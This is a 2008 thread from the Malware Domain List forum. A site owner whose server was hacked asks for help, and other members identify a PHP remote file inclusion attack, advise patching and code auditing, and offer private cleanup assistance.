Malware Domain List

Malware Related => Compromised Servers => Topic started by: GHands on June 11, 2008, 10:52:07 pm

Title: My site is on your list, i need some help with the mess i found.
Post by: GHands on June 11, 2008, 10:52:07 pm
HI,

My server got hacked towards the end of May, they left a file behind, along with some programs that they were piggying on my server.

My host originally switched off and suspended, as the server tried spamming, they had setup a spoof email account, and IRC channel, sourceguardian and ioncube.

I have alot of .txt files that i cannot make sense from, could i post here for comments? I think they are relaying or something, as my site is linked to a named txt file in a lot of peoples logs.

Apart from being confused in how they hacked my site, (Across multiple domains) and spending the best part of a week cleaning the server, I would like to learn from this.

Any help appreciated?

http://www.malwaredomainlist.com/mdl.php?search=fdmclan.net
Title: Re: My site is on your list, i need some help with the mess i found.
Post by: sowhat-x on June 12, 2008, 03:55:18 am
Quote
I have alot of .txt files that i cannot make sense from,could i post here for comments?

Sure you can,an important note though...since the forums here are in public view,
most probably you don't want to disclose that many details/info,
as you never know who might be reading the forums around...

Not a php guru myself - what I see though in the list,
is that a remote file inclusion took place (arab.txt is a widely used/spread malware script).
Meaning that,except obviously from patching the webserver software to the latest version etc.,
you should also audit the php code for mistakes...in order for such an incident to not happen again.
There are a few guys around way more experienced in that area,
that can give you way more detailed explanations/instructions...
hopefully they're willing to give more help than I can do.  :)
Title: Re: My site is on your list, i need some help with the mess i found.
Post by: sowhat-x on June 12, 2008, 06:44:50 am
Quote
Apart from being confused in how they hacked my site, (Across multiple domains)...
...If by that you mean what an RFI is/how it works,
googling for "php remote file inclusion tutorial",will give you all the answers you need...

One more thing - forgot mentioning it previously...
that since the site has been 'cleaned' up now,it will obviously be removed from the list.
If possible though,do consider submitting any malware executables/scripts that you found,
at services like UploadMalware.com,VirusTotal etc...
Title: Re: My site is on your list, i need some help with the mess i found.
Post by: Orac on June 12, 2008, 12:29:03 pm
Hi GHands

Just seen your post.

Iam admin on a server support forum, if your intrested your welcome to join the forum and we will help you clean your server.

The forum is closed to the public, and we would open a room for you that can only be accessed by yourself, and our server support staff.

If you wish to proceed please send me a PM here, together with the username that you intend to use (we keep the forum locked down from prying eyes, so i will need to know the name you would be registering with).